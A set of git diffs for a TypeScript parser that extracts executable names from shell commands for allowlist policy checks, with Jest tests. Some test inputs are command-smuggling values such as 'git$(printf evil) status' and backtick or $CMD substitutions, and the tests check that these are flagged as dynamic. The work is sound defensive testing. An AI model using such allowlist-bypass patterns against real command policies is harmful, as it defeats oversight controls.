   });
 

--- a/packages/core/__tests__/policy/parser.test.ts
+++ b/packages/core/__tests__/policy/parser.test.ts
@@ -303,6 +303,25 @@ describe('Command Parser', () => {
       expect(result).not.toContain('EOF');
     });
 
+    it('ignores heredoc markers in comments', () => {
+      const command = ['echo ok # <<EOF', 'git status'].join('\n');
+      const result = extractAllExecutables(command);
+
+      expect(result).toContain('echo');
+      expect(result).toContain('git');
+      expect(result).not.toContain('EOF');
+    });
+
+    it('terminates heredoc delimiters before shell metacharacters', () => {
+      const command = ['cat <<EOF>out', 'payload', 'EOF', 'git status'].join('\n');
+      const result = extractAllExecutables(command);
+
+      expect(result).toContain('cat');
+      expect(result).toContain('git');
+      expect(result).not.toContain('payload');
+      expect(result).not.toContain('EOF');
+    });
+
     it('does not treat descriptor duplication redirects as command boundaries', () => {
       expect(extractAllExecutables('cmd 2>&1')).toEqual(['cmd']);
       expect(extractAllExecutables('cmd <&0')).toEqual(['cmd']);
@@ -324,6 +343,13 @@ describe('Command Parser', () => {
 
       expect(result).toContain('sh');
       expect(result).toContain(DYNAMIC_EXECUTABLE_SENTINEL);
+    });
+
+    it('extracts executables from multiline backtick substitutions', () => {
+      const result = extractAllExecutables(['echo `printf hello', 'world`'].join('\n'));
+
+      expect(result).toContain('echo');
+      expect(result).toContain('printf');
     });
   });
 

--- a/packages/core/__tests__/policy/parser.test.ts
+++ b/packages/core/__tests__/policy/parser.test.ts
@@ -223,7 +223,7 @@ describe('Command Parser', () => {
     });
 
     it('embedded substitution in executable word: prefix is not accepted as safe', () => {
-      // git$(printf evil) runs 'gitevil' (or similar), NOT 'git'.
+      // git$(printf evil) runs something like 'gitevil', NOT 'git'.
       // A policy allowing git,printf must not accept this command.
       const result = extractAllExecutables('git$(printf evil) status');
 
@@ -233,6 +233,207 @@ describe('Command Parser', () => {
       expect(result).toContain(DYNAMIC_EXECUTABLE_SENTINEL);
       // printf IS inside the substitution and will be found by extractDollarSubstitutions.
       expect(result).toContain('printf');
+    });
+  });
+
+  describe('extractAllExecutables — PR #257 review regressions', () => {
+    it('treats a leading $VAR command word as dynamic instead of using the next argument', () => {
+      const result = extractAllExecutables('$CMD git');
+
+      expect(result).toContain(DYNAMIC_EXECUTABLE_SENTINEL);
+      expect(result).not.toContain('git');
+    });
+
+    it('treats $VAR inside the executable word as dynamic', () => {
+      const result = extractAllExecutables('git$SUFFIX status');
+
+      expect(result).toContain(DYNAMIC_EXECUTABLE_SENTINEL);
+      expect(result).not.toContain('git');
+    });
+
+    it('treats ${VAR} inside the executable word as dynamic', () => {
+      const result = extractAllExecutables('git${SUFFIX} status');
+
+      expect(result).toContain(DYNAMIC_EXECUTABLE_SENTINEL);
+      expect(result).not.toContain('git');
+    });
+
+    it('extracts substitutions whose quoted arguments contain opening parentheses', () => {
+      const result = extractAllExecutables('echo $(printf "(")');
+
+      expect(result).toContain('echo');
+      expect(result).toContain('printf');
+    });
+
+    it('does not let quoted closing parens inside $() consume following commands', () => {
+      const result = extractAllExecutables('echo "$(printf ")")" && git status');
+
+      expect(result).toContain('echo');
+      expect(result).toContain('printf');
+      expect(result).toContain('git');
+    });
+
+    it('does not extract executables from heredoc body lines or terminators', () => {
+      const command = ['cat <<EOF', 'printf hi', 'EOF'].join('\n');
+      const result = extractAllExecutables(command);
+
+      expect(result).toEqual(['cat']);
+    });
+
+    it('resumes command extraction after a heredoc terminator line', () => {
+      const command = ['cat <<EOF', 'printf hi', 'EOF', 'git status'].join('\n');
+      const result = extractAllExecutables(command);
+
+      expect(result).toContain('cat');
+      expect(result).toContain('git');
+      expect(result).not.toContain('printf');
+      expect(result).not.toContain('EOF');
+    });
+  });
+
+  describe('tokenizer edge cases', () => {
+    // scanVar — ${VAR} brace form (lines 116-117)
+    it('handles ${VAR} brace syntax in argument position', () => {
+      const result = extractCommands('echo ${HOME}');
+      expect(result).toHaveLength(1);
+      expect(result[0].executable).toBe('echo');
+    });
+
+    // scanVar — $VAR plain form in normal context (lines 256-258)
+    it('handles $VAR in argument position', () => {
+      const result = extractCommands('echo $HOME');
+      expect(result).toHaveLength(1);
+      expect(result[0].executable).toBe('echo');
+    });
+
+    // bare $ not followed by identifier or ( — stays literal (lines 259-261)
+    it('treats bare $ not followed by identifier as literal', () => {
+      const result = extractCommands('echo $5');
+      expect(result).toHaveLength(1);
+      expect(result[0].executable).toBe('echo');
+    });
+
+    // >> append redirect (lines 295-302)
+    it('handles >> append redirect', () => {
+      const result = extractCommands('echo hello >> file.txt');
+      expect(result).toHaveLength(1);
+      expect(result[0].executable).toBe('echo');
+    });
+
+    // << here-doc redirect (lines 305-312)
+    it('handles << heredoc redirect', () => {
+      const result = extractCommands('cat << EOF');
+      expect(result).toHaveLength(1);
+      expect(result[0].executable).toBe('cat');
+    });
+
+    // < input redirect (lines 355-362)
+    it('handles < input redirect', () => {
+      const result = extractCommands('cmd < file.txt');
+      expect(result).toHaveLength(1);
+      expect(result[0].executable).toBe('cmd');
+    });
+
+    // & background execution (lines 330-333)
+    it('handles & background execution as statement boundary', () => {
+      const result = extractCommands('cmd &');
+      expect(result).toHaveLength(1);
+      expect(result[0].executable).toBe('cmd');
+    });
+
+    // ( ) subshell delimiters (lines 337-340)
+    it('handles ( ) subshell as statement boundaries', () => {
+      const result = extractCommands('(cmd)');
+      expect(result).toHaveLength(1);
+      expect(result[0].executable).toBe('cmd');
+    });
+
+    // # comment (lines 243-244)
+    it('strips # comment to end of line', () => {
+      const result = extractCommands('git status # this is a comment');
+      expect(result).toHaveLength(1);
+      expect(result[0].executable).toBe('git');
+    });
+
+    // backslash line continuation (line 233-234)
+    it('handles backslash-newline line continuation', () => {
+      const result = extractCommands('git \\\nstatus');
+      expect(result).toHaveLength(1);
+      expect(result[0].executable).toBe('git');
+    });
+
+    // escape in double-quote — recognized escape chars (lines 183-185)
+    it('handles escape sequences in double-quote context', () => {
+      // \" is an escaped double-quote — stays in the word, closes nothing
+      const result = extractCommands('echo "foo\\"bar"');
+      expect(result).toHaveLength(1);
+      expect(result[0].executable).toBe('echo');
+    });
+
+    // escape in double-quote — unrecognized escape stays literal (line 187)
+    it('keeps unrecognized backslash sequences literal in double-quote', () => {
+      // \t is not a recognized escape in double-quote — both chars kept
+      const result = extractCommands('echo "foo\\tbar"');
+      expect(result).toHaveLength(1);
+      expect(result[0].executable).toBe('echo');
+    });
+
+    // bare $ in double-quote — not followed by ( or identifier (lines 203-204)
+    it('treats bare $ in double-quote as literal', () => {
+      const result = extractCommands('echo "cost is $5"');
+      expect(result).toHaveLength(1);
+      expect(result[0].executable).toBe('echo');
+    });
+
+    // backtick in double-quote — marks word dynamic (lines 210-213)
+    it('marks word dynamic when backtick appears in double-quote', () => {
+      // echo is a plain word; the argument `id` makes that argument dynamic
+      const result = extractAllExecutables('echo "`id`"');
+      expect(result).toContain('echo');
+      expect(result).toContain('id'); // extracted by extractBacktickCommands
+    });
+
+    // nested $(...) — exercises level tracking in extractDollarSubstitutions (lines 579-580)
+    it('extracts executables from nested $(…) substitutions', () => {
+      const result = extractAllExecutables('echo $(printf $(id))');
+      expect(result).toContain('echo');
+      expect(result).toContain('printf');
+      expect(result).toContain('id');
+    });
+
+    // bare $ in double-quote not followed by ( or \w — stays literal (lines 203-204)
+    it('treats bare $ not followed by identifier as literal in double-quote', () => {
+      // $! is not an identifier — the $ becomes a literal character
+      const result = extractCommands('echo "$!"');
+      expect(result).toHaveLength(1);
+      expect(result[0].executable).toBe('echo');
+    });
+
+    // backslash-escape in normal context — non-newline case (lines 236-237)
+    it('backslash escapes next character in normal context', () => {
+      // \  (backslash-space) embeds a space in the word rather than splitting it
+      const result = extractCommands('echo\\ world');
+      expect(result).toHaveLength(1);
+      expect(result[0].executable).toBe('echo world');
+    });
+
+    // bare $ in normal context not followed by ( or \w (lines 260-261)
+    it('treats bare $ not followed by identifier as literal in normal context', () => {
+      const result = extractCommands('echo $!');
+      expect(result).toHaveLength(1);
+      expect(result[0].executable).toBe('echo');
+    });
+
+    // fd-number digit suppression for >> (line 296)
+    it('suppresses fd-number digit before >> redirect', () => {
+      const result = extractAllExecutables('cmd 2>>log');
+      expect(result).toEqual(['cmd']);
+    });
+
+    // fd-number digit suppression for < (line 356)
+    it('suppresses fd-number digit before < redirect', () => {
+      const result = extractAllExecutables('cmd 1<file');
+      expect(result).toEqual(['cmd']);
     });
   });
 });

--- a/packages/core/__tests__/policy/parser.test.ts
+++ b/packages/core/__tests__/policy/parser.test.ts
@@ -56,23 +56,26 @@ describe('Command Parser', () => {
     it('should handle sh -c wrapper', () => {
       const result = extractCommands('sh -c "npm test"');
 
-      expect(result).toHaveLength(1);
-      expect(result[0].executable).toBe('npm');
+      expect(result).toHaveLength(2);
+      expect(result[0].executable).toBe('sh');
+      expect(result[1].executable).toBe('npm');
     });
 
     it('should handle bash -c wrapper', () => {
       const result = extractCommands('bash -c "git commit -m message"');
 
-      expect(result).toHaveLength(1);
-      expect(result[0].executable).toBe('git');
+      expect(result).toHaveLength(2);
+      expect(result[0].executable).toBe('bash');
+      expect(result[1].executable).toBe('git');
     });
 
     it('should handle nested commands in sh -c', () => {
       const result = extractCommands('sh -c "npm test && npm run build"');
 
-      expect(result).toHaveLength(2);
-      expect(result[0].executable).toBe('npm');
+      expect(result).toHaveLength(3);
+      expect(result[0].executable).toBe('sh');
       expect(result[1].executable).toBe('npm');
+      expect(result[2].executable).toBe('npm');
     });
 
     it('should handle command with quoted arguments', () => {
@@ -130,10 +133,10 @@ describe('Command Parser', () => {
       expect(result).toBe('cat');
     });
 
-    it('should return nested command for sh -c', () => {
+    it('should return shell wrapper executable for sh -c', () => {
       const result = extractPrimaryExecutable('sh -c "npm test"');
 
-      expect(result).toBe('npm');
+      expect(result).toBe('sh');
     });
 
     it('should return null for empty command', () => {
@@ -288,6 +291,39 @@ describe('Command Parser', () => {
       expect(result).toContain('git');
       expect(result).not.toContain('printf');
       expect(result).not.toContain('EOF');
+    });
+
+    it('resumes command extraction after a backslash-quoted heredoc terminator', () => {
+      const command = ['cat <<\\EOF', 'printf hi', 'EOF', 'git status'].join('\n');
+      const result = extractAllExecutables(command);
+
+      expect(result).toContain('cat');
+      expect(result).toContain('git');
+      expect(result).not.toContain('printf');
+      expect(result).not.toContain('EOF');
+    });
+
+    it('does not treat descriptor duplication redirects as command boundaries', () => {
+      expect(extractAllExecutables('cmd 2>&1')).toEqual(['cmd']);
+      expect(extractAllExecutables('cmd <&0')).toEqual(['cmd']);
+    });
+
+    it('does not treat clobber redirects as pipeline command boundaries', () => {
+      expect(extractAllExecutables('cmd >|file')).toEqual(['cmd']);
+    });
+
+    it('preserves shell wrappers alongside nested -c commands', () => {
+      const result = extractAllExecutables('sh -c "git status"');
+
+      expect(result).toContain('sh');
+      expect(result).toContain('git');
+    });
+
+    it('treats dynamic shell -c scripts as unknown executable content', () => {
+      const result = extractAllExecutables('sh -c "$CMD"');
+
+      expect(result).toContain('sh');
+      expect(result).toContain(DYNAMIC_EXECUTABLE_SENTINEL);
     });
   });
 

--- a/packages/core/package.json
+++ b/packages/core/package.json
@@ -50,7 +50,6 @@
     "js-yaml": "^4.1.1",
     "lilconfig": "^3.1.3",
     "picomatch": "^4.0.4",
-    "shell-quote": "^1.8.3",
     "xstate": "^5.30.0",
     "zod": "^3.24.1"
   },
@@ -59,7 +58,6 @@
     "@types/js-yaml": "^4.0.9",
     "@types/node": "^25.6.0",
     "@types/picomatch": "^4.0.3",
-    "@types/shell-quote": "^1.7.5",
     "fast-check": "^4.7.0",
     "jest": "^30.3.0",
     "ts-jest": "^29.4.9",

--- a/packages/core/src/policy/parser.ts
+++ b/packages/core/src/policy/parser.ts
@@ -30,7 +30,7 @@ export interface ParsedCommand {
 // ---------------------------------------------------------------------------
 
 /** Word token — a command word (executable, argument, or redirect target). */
-type WordToken = { kind: 'word'; value: string };
+type WordToken = { kind: 'word'; value: string; dynamic?: boolean };
 /** Op token — a statement boundary: ; \n && || | ( ) */
 type OpToken = { kind: 'op' };
 /** Redir token — a redirect operator that is NOT a statement boundary: > >> < << */
@@ -39,6 +39,16 @@ type Token = WordToken | OpToken | RedirToken;
 
 /** Shell executable names for sh -c wrapper detection. */
 const SHELLS = new Set(['sh', 'bash', 'zsh', 'ksh', 'dash', 'fish', 'csh', 'tcsh']);
+
+/**
+ * Sentinel executable emitted when a command word contains an embedded runtime
+ * substitution (e.g. `git$(evil)`). The word's value is unknowable at parse time,
+ * so no allowlist pattern can safely match it. The null-byte prefix is intentional —
+ * it cannot appear in a Unix executable name and therefore never matches any real
+ * allowlist entry, ensuring the policy evaluator denies the command unless
+ * `--allow-all` is set.
+ */
+export const DYNAMIC_EXECUTABLE_SENTINEL = '\x00<dynamic>';
 
 /**
  * Advance past a balanced $(...) block.
@@ -123,6 +133,9 @@ function scanVar(command: string, startIdx: number): number {
  * - `>`, `>>`, `<`, `<<` emit redir tokens (not op) so redirect targets stay in the
  *   same statement and are never mistaken for executables
  * - Empty word buffers are suppressed — no empty-string word tokens
+ * - Words that contain an embedded substitution (e.g. `git$(evil)`) are marked
+ *   `dynamic: true` — the value is unknowable at parse time and extractCommands will
+ *   emit DYNAMIC_EXECUTABLE_SENTINEL rather than accepting the literal prefix as safe
  *
  * @param command - Shell command string to tokenize
  * @returns Array of tokens
@@ -130,13 +143,17 @@ function scanVar(command: string, startIdx: number): number {
 function tokenize(command: string): Token[] {
   const tokens: Token[] = [];
   let wordBuf = '';
+  let wordIsDynamic = false;
   let state: 'normal' | 'single' | 'double' = 'normal';
   let i = 0;
 
   const flushWord = (): void => {
-    if (wordBuf.length > 0) {
-      tokens.push({ kind: 'word', value: wordBuf });
+    if (wordBuf.length > 0 || wordIsDynamic) {
+      const token: WordToken = { kind: 'word', value: wordBuf };
+      if (wordIsDynamic) token.dynamic = true;
+      tokens.push(token);
       wordBuf = '';
+      wordIsDynamic = false;
     }
   };
 
@@ -175,7 +192,8 @@ function tokenize(command: string): Token[] {
       if (ch === '$') {
         const next = command[i + 1] ?? '';
         if (next === '(') {
-          // Skip $(…) inside double-quote — extracted by extractDollarSubstitutions
+          // $(…) inside double-quote: word value is now unknowable at parse time
+          wordIsDynamic = true;
           const end = scanSubst(command, i + 2);
           i = end < 0 ? i + 2 : end;
         } else if (/[\w{]/.test(next)) {
@@ -188,6 +206,8 @@ function tokenize(command: string): Token[] {
         continue;
       }
       if (ch === '`') {
+        // Backtick inside double-quote: word value is now unknowable at parse time
+        wordIsDynamic = true;
         const end = scanBacktick(command, i + 1);
         i = end < 0 ? i + 1 : end;
         continue;
@@ -227,8 +247,10 @@ function tokenize(command: string): Token[] {
       const prev = i > 0 ? command[i - 1] : '';
       const next = command[i + 1] ?? '';
       if (next === '(' && prev !== '$') {
-        // $(…) command substitution — skip body, extracted by extractDollarSubstitutions
-        flushWord();
+        // $(…) command substitution: marks the current word as dynamic — the word's
+        // value is unknowable at parse time. Do NOT flush the prefix as a valid word;
+        // the entire token (prefix + substitution + any suffix) is dynamic.
+        wordIsDynamic = true;
         const end = scanSubst(command, i + 2);
         i = end < 0 ? i + 2 : end;
       } else if (/[\w{]/.test(next)) {
@@ -241,7 +263,8 @@ function tokenize(command: string): Token[] {
       continue;
     }
     if (ch === '`') {
-      flushWord();
+      // Backtick substitution: marks the current word as dynamic (same as $(...)).
+      wordIsDynamic = true;
       const end = scanBacktick(command, i + 1);
       i = end < 0 ? i + 1 : end;
       continue;
@@ -392,41 +415,54 @@ export function extractCommands(command: string): ParsedCommand[] {
   const commands: ParsedCommand[] = [];
   const tokens = tokenize(command);
 
-  let stmtWords: string[] = [];
+  let stmtTokens: WordToken[] = [];
   let skipNextWord = false;
 
   const flushStatement = (): void => {
-    const words = stmtWords;
-    stmtWords = [];
+    const words = stmtTokens;
+    stmtTokens = [];
     skipNextWord = false;
 
     if (words.length === 0) return;
 
     // Skip leading KEY=VALUE assignments to find the actual executable
     let execIdx = 0;
-    while (execIdx < words.length && isEnvAssignment(words[execIdx])) execIdx++;
+    while (execIdx < words.length && isEnvAssignment(words[execIdx].value)) execIdx++;
     if (execIdx >= words.length) return;
 
-    const executable = path.basename(words[execIdx]);
+    const firstWord = words[execIdx];
+
+    // If the executable word contains an embedded substitution its value is
+    // unknowable at parse time. Emit the sentinel so the policy evaluator
+    // cannot match it against any allowlist entry.
+    if (firstWord.dynamic) {
+      commands.push({
+        executable: DYNAMIC_EXECUTABLE_SENTINEL,
+        original: words.map((w) => w.value).join(' '),
+      });
+      return;
+    }
+
+    const executable = path.basename(firstWord.value);
     if (!executable) return;
 
     // sh -c detection: recursively parse the -c argument
     if (SHELLS.has(executable)) {
       let dashCIdx = -1;
       for (let k = 0; k < words.length; k++) {
-        if (words[k] === '-c') {
+        if (words[k].value === '-c') {
           dashCIdx = k;
           break;
         }
       }
       if (dashCIdx >= 0 && dashCIdx + 1 < words.length) {
-        const nested = extractCommands(words[dashCIdx + 1]);
+        const nested = extractCommands(words[dashCIdx + 1].value);
         commands.push(...nested);
         return;
       }
     }
 
-    commands.push({ executable, original: words.join(' ') });
+    commands.push({ executable, original: words.map((w) => w.value).join(' ') });
   };
 
   for (const tok of tokens) {
@@ -436,11 +472,11 @@ export function extractCommands(command: string): ParsedCommand[] {
       // Next word is a redirect target — skip it, it is not an executable
       skipNextWord = true;
     } else {
-      // word token
+      // word token — TypeScript narrows to WordToken here
       if (skipNextWord) {
         skipNextWord = false;
       } else {
-        stmtWords.push(tok.value);
+        stmtTokens.push(tok);
       }
     }
   }

--- a/packages/core/src/policy/parser.ts
+++ b/packages/core/src/policy/parser.ts
@@ -36,7 +36,7 @@ type OpToken = { kind: 'op' };
 /** Redir token — a redirect operator that is NOT a statement boundary: > >> < << */
 type RedirToken = { kind: 'redir' };
 type Token = WordToken | OpToken | RedirToken;
-type HeredocDelimiter = { value: string; stripLeadingTabs: boolean };
+type HeredocDelimiter = { value: string; stripLeadingTabs: boolean; expands: boolean };
 
 /** Shell executable names for sh -c wrapper detection. */
 const SHELLS = new Set(['sh', 'bash', 'zsh', 'ksh', 'dash', 'fish', 'csh', 'tcsh']);
@@ -199,6 +199,7 @@ function extractHeredocDelimiters(line: string): HeredocDelimiter[] {
 
     let delimiter = '';
     let delimiterQuote: "'" | '"' | null = null;
+    let delimiterWasQuoted = false;
     while (i < line.length) {
       const current = line[i];
 
@@ -228,18 +229,21 @@ function extractHeredocDelimiters(line: string): HeredocDelimiter[] {
       }
 
       if (current === "'") {
+        delimiterWasQuoted = true;
         delimiterQuote = "'";
         i++;
         continue;
       }
 
       if (current === '"' && !isOddBackslashEscaped(line, i, 0)) {
+        delimiterWasQuoted = true;
         delimiterQuote = '"';
         i++;
         continue;
       }
 
       if (current === '\\' && i + 1 < line.length) {
+        delimiterWasQuoted = true;
         delimiter += line[i + 1];
         i += 2;
         continue;
@@ -263,7 +267,13 @@ function extractHeredocDelimiters(line: string): HeredocDelimiter[] {
       i++;
     }
 
-    if (delimiter.length > 0) delimiters.push({ value: delimiter, stripLeadingTabs });
+    if (delimiter.length > 0) {
+      delimiters.push({
+        value: delimiter,
+        stripLeadingTabs,
+        expands: !delimiterWasQuoted,
+      });
+    }
   }
 
   return delimiters;
@@ -274,12 +284,15 @@ function extractHeredocDelimiters(line: string): HeredocDelimiter[] {
  *
  * Heredoc bodies are data, not executable shell source. Keeping the initiating
  * line preserves the command that consumes the heredoc while preventing body
- * text and terminators from becoming phantom commands.
+ * text and terminators from becoming phantom commands. Substitution scanners
+ * can opt into retaining unquoted heredoc bodies because shells expand command
+ * substitutions and backticks in those bodies.
  *
  * @param command - Shell command string
+ * @param keepExpandingBodies - Whether to keep unquoted heredoc body lines
  * @returns Command with heredoc body and terminator lines omitted
  */
-function stripHeredocBodies(command: string): string {
+function stripHeredocBodies(command: string, keepExpandingBodies = false): string {
   const lines = command.split('\n');
   const kept: string[] = [];
   const pendingDelimiters: HeredocDelimiter[] = [];
@@ -290,6 +303,8 @@ function stripHeredocBodies(command: string): string {
       const terminatorLine = terminator.stripLeadingTabs ? line.replace(/^\t+/, '') : line;
       if (terminatorLine === terminator.value) {
         pendingDelimiters.shift();
+      } else if (keepExpandingBodies && terminator.expands) {
+        kept.push(line);
       }
       continue;
     }
@@ -819,7 +834,7 @@ export function extractAllExecutables(command: string, depth = 0): string[] {
  */
 export function extractBacktickCommands(command: string, depth = 0): string[] {
   const executables: string[] = [];
-  const normalizedCommand = stripHeredocBodies(command);
+  const normalizedCommand = stripHeredocBodies(command, true);
   let i = 0;
 
   while (i < normalizedCommand.length) {
@@ -854,7 +869,7 @@ export function extractDollarSubstitutions(command: string, depth = 0): string[]
   // Use balanced parenthesis counting instead of regex to avoid ReDoS
   // and correctly handle nested $(...) substitutions
   const executables: string[] = [];
-  const normalizedCommand = stripHeredocBodies(command);
+  const normalizedCommand = stripHeredocBodies(command, true);
   let i = 0;
   while (i < normalizedCommand.length - 1) {
     // Match $( but not $$( — double-dollar is PID expansion, not command substitution.

--- a/packages/core/src/policy/parser.ts
+++ b/packages/core/src/policy/parser.ts
@@ -1,13 +1,18 @@
 /**
  * Command parser for extracting executable names from shell commands.
  *
- * Uses shell-quote to safely parse complex shell commands including
- * pipelines, redirections, and `sh -c` wrappers.
+ * Purpose-built for policy extraction: identifies which programs a bash
+ * command block will invoke so they can be checked against an allowlist.
+ *
+ * Uses a hand-crafted character-level tokenizer rather than shell-quote,
+ * which correctly handles the following patterns that shell-quote mishandles:
+ * - Newlines as statement separators (not whitespace)
+ * - $VAR references: skipped without expansion (no phantom empty executables)
+ * - Redirect targets (> >> < <<): not statement boundaries, never treated as executables
  *
  * @module
  */
 
-import { parse } from 'shell-quote';
 import * as path from 'node:path';
 
 /**
@@ -20,6 +25,342 @@ export interface ParsedCommand {
   original: string;
 }
 
+// ---------------------------------------------------------------------------
+// Internal tokenizer
+// ---------------------------------------------------------------------------
+
+/** Word token — a command word (executable, argument, or redirect target). */
+type WordToken = { kind: 'word'; value: string };
+/** Op token — a statement boundary: ; \n && || | ( ) */
+type OpToken = { kind: 'op' };
+/** Redir token — a redirect operator that is NOT a statement boundary: > >> < << */
+type RedirToken = { kind: 'redir' };
+type Token = WordToken | OpToken | RedirToken;
+
+/** Shell executable names for sh -c wrapper detection. */
+const SHELLS = new Set(['sh', 'bash', 'zsh', 'ksh', 'dash', 'fish', 'csh', 'tcsh']);
+
+/**
+ * Advance past a balanced $(...) block.
+ *
+ * startIdx is the position immediately after the opening '(' in '$('. Uses the
+ * same balanced-parenthesis algorithm as extractDollarSubstitutions to handle
+ * nesting and escaped parens consistently.
+ *
+ * @param command - Full command string
+ * @param startIdx - Position immediately after the opening '('
+ * @returns Index after the matching ')' or -1 if unbalanced
+ */
+function scanSubst(command: string, startIdx: number): number {
+  let level = 1;
+  let i = startIdx;
+  while (i < command.length && level > 0) {
+    const ch = command[i];
+    if (ch === '(' || ch === ')') {
+      let bs = 0;
+      let k = i - 1;
+      while (k >= startIdx && command[k] === '\\') {
+        bs++;
+        k--;
+      }
+      if (bs % 2 === 0) {
+        if (ch === '(') level++;
+        else level--;
+      }
+    }
+    i++;
+  }
+  return level === 0 ? i : -1;
+}
+
+/**
+ * Advance past a backtick block.
+ *
+ * @param command - Full command string
+ * @param startIdx - Position immediately after the opening backtick
+ * @returns Index after the closing backtick or -1 if unmatched
+ */
+function scanBacktick(command: string, startIdx: number): number {
+  let i = startIdx;
+  while (i < command.length) {
+    if (command[i] === '\\') {
+      i += 2;
+      continue;
+    }
+    if (command[i] === '`') return i + 1;
+    i++;
+  }
+  return -1;
+}
+
+/**
+ * Advance past a $VAR or ${VAR} reference.
+ *
+ * @param command - Full command string
+ * @param startIdx - Position immediately after the '$'
+ * @returns Index after the variable reference
+ */
+function scanVar(command: string, startIdx: number): number {
+  if (startIdx >= command.length) return startIdx;
+  if (command[startIdx] === '{') {
+    const end = command.indexOf('}', startIdx + 1);
+    return end < 0 ? startIdx + 1 : end + 1;
+  }
+  let i = startIdx;
+  while (i < command.length && /\w/.test(command[i])) i++;
+  return i;
+}
+
+/**
+ * Tokenize a shell command string into words, statement-boundary operators,
+ * and redirect markers.
+ *
+ * Key design decisions vs. shell-quote:
+ * - `\n` is a statement boundary (op), not whitespace
+ * - `$VAR` references are skipped entirely — produce no token and no empty string
+ * - `$(…)` and backtick bodies are skipped — their content is handled separately by
+ *   extractDollarSubstitutions / extractBacktickCommands on the raw string
+ * - `>`, `>>`, `<`, `<<` emit redir tokens (not op) so redirect targets stay in the
+ *   same statement and are never mistaken for executables
+ * - Empty word buffers are suppressed — no empty-string word tokens
+ *
+ * @param command - Shell command string to tokenize
+ * @returns Array of tokens
+ */
+function tokenize(command: string): Token[] {
+  const tokens: Token[] = [];
+  let wordBuf = '';
+  let state: 'normal' | 'single' | 'double' = 'normal';
+  let i = 0;
+
+  const flushWord = (): void => {
+    if (wordBuf.length > 0) {
+      tokens.push({ kind: 'word', value: wordBuf });
+      wordBuf = '';
+    }
+  };
+
+  while (i < command.length) {
+    const ch = command[i];
+
+    // ── Single-quote context: everything literal until closing ' ───────────
+    if (state === 'single') {
+      if (ch === "'") {
+        state = 'normal';
+        i++;
+      } else {
+        wordBuf += ch;
+        i++;
+      }
+      continue;
+    }
+
+    // ── Double-quote context: $VAR and $(...) still active, spaces literal ─
+    if (state === 'double') {
+      if (ch === '"') {
+        state = 'normal';
+        i++;
+        continue;
+      }
+      if (ch === '\\') {
+        const next = command[i + 1] ?? '';
+        if (next === '"' || next === '\\' || next === '$' || next === '`') {
+          wordBuf += next;
+        } else {
+          wordBuf += ch + next;
+        }
+        i += 2;
+        continue;
+      }
+      if (ch === '$') {
+        const next = command[i + 1] ?? '';
+        if (next === '(') {
+          // Skip $(…) inside double-quote — extracted by extractDollarSubstitutions
+          const end = scanSubst(command, i + 2);
+          i = end < 0 ? i + 2 : end;
+        } else if (/[\w{]/.test(next)) {
+          // Skip $VAR inside double-quote — no expansion, no empty token
+          i = scanVar(command, i + 1);
+        } else {
+          wordBuf += ch;
+          i++;
+        }
+        continue;
+      }
+      if (ch === '`') {
+        const end = scanBacktick(command, i + 1);
+        i = end < 0 ? i + 1 : end;
+        continue;
+      }
+      wordBuf += ch;
+      i++;
+      continue;
+    }
+
+    // ── Normal context ────────────────────────────────────────────────────
+    if (ch === "'") {
+      state = 'single';
+      i++;
+      continue;
+    }
+    if (ch === '"') {
+      state = 'double';
+      i++;
+      continue;
+    }
+    if (ch === '\\') {
+      const next = command[i + 1] ?? '';
+      if (next === '\n') {
+        i += 2; // line continuation — skip backslash + newline
+      } else {
+        wordBuf += next;
+        i += 2;
+      }
+      continue;
+    }
+    // Comment — skip to end of line (only when at start of a new token)
+    if (ch === '#' && wordBuf.length === 0) {
+      while (i < command.length && command[i] !== '\n') i++;
+      continue;
+    }
+    if (ch === '$') {
+      const prev = i > 0 ? command[i - 1] : '';
+      const next = command[i + 1] ?? '';
+      if (next === '(' && prev !== '$') {
+        // $(…) command substitution — skip body, extracted by extractDollarSubstitutions
+        flushWord();
+        const end = scanSubst(command, i + 2);
+        i = end < 0 ? i + 2 : end;
+      } else if (/[\w{]/.test(next)) {
+        // $VAR reference — skip entirely, produces no token
+        i = scanVar(command, i + 1);
+      } else {
+        wordBuf += ch;
+        i++;
+      }
+      continue;
+    }
+    if (ch === '`') {
+      flushWord();
+      const end = scanBacktick(command, i + 1);
+      i = end < 0 ? i + 1 : end;
+      continue;
+    }
+
+    // Whitespace (space and tab — \n handled below as operator)
+    if (ch === ' ' || ch === '\t') {
+      flushWord();
+      i++;
+      continue;
+    }
+
+    // Multi-character operators (must check before single-char fallthrough)
+    const next = command[i + 1] ?? '';
+    if (ch === '&' && next === '&') {
+      flushWord();
+      tokens.push({ kind: 'op' });
+      i += 2;
+      continue;
+    }
+    if (ch === '|' && next === '|') {
+      flushWord();
+      tokens.push({ kind: 'op' });
+      i += 2;
+      continue;
+    }
+    if (ch === '>' && next === '>') {
+      if (/^\d+$/.test(wordBuf)) {
+        wordBuf = '';
+      } else {
+        flushWord();
+      }
+      tokens.push({ kind: 'redir' });
+      i += 2;
+      continue;
+    }
+    if (ch === '<' && next === '<') {
+      if (/^\d+$/.test(wordBuf)) {
+        wordBuf = '';
+      } else {
+        flushWord();
+      }
+      tokens.push({ kind: 'redir' });
+      i += 2;
+      continue;
+    }
+
+    // Single-character statement boundaries
+    if (ch === '\n' || ch === ';') {
+      flushWord();
+      tokens.push({ kind: 'op' });
+      i++;
+      continue;
+    }
+    if (ch === '|') {
+      flushWord();
+      tokens.push({ kind: 'op' });
+      i++;
+      continue;
+    }
+    if (ch === '&') {
+      // Background execution (&) — treat as statement boundary
+      flushWord();
+      tokens.push({ kind: 'op' });
+      i++;
+      continue;
+    }
+    if (ch === '(' || ch === ')') {
+      // Subshell delimiters — statement boundaries
+      flushWord();
+      tokens.push({ kind: 'op' });
+      i++;
+      continue;
+    }
+
+    // Redirect operators — NOT statement boundaries
+    if (ch === '>') {
+      if (/^\d+$/.test(wordBuf)) {
+        wordBuf = '';
+      } else {
+        flushWord();
+      }
+      tokens.push({ kind: 'redir' });
+      i++;
+      continue;
+    }
+    if (ch === '<') {
+      if (/^\d+$/.test(wordBuf)) {
+        wordBuf = '';
+      } else {
+        flushWord();
+      }
+      tokens.push({ kind: 'redir' });
+      i++;
+      continue;
+    }
+
+    wordBuf += ch;
+    i++;
+  }
+
+  flushWord();
+  return tokens;
+}
+
+// ---------------------------------------------------------------------------
+// Command extraction
+// ---------------------------------------------------------------------------
+
+/**
+ * Check if a word is an environment variable assignment (KEY=VALUE).
+ *
+ * @param token - Token string to check
+ * @returns True if the token is a KEY=VALUE assignment
+ */
+function isEnvAssignment(token: string): boolean {
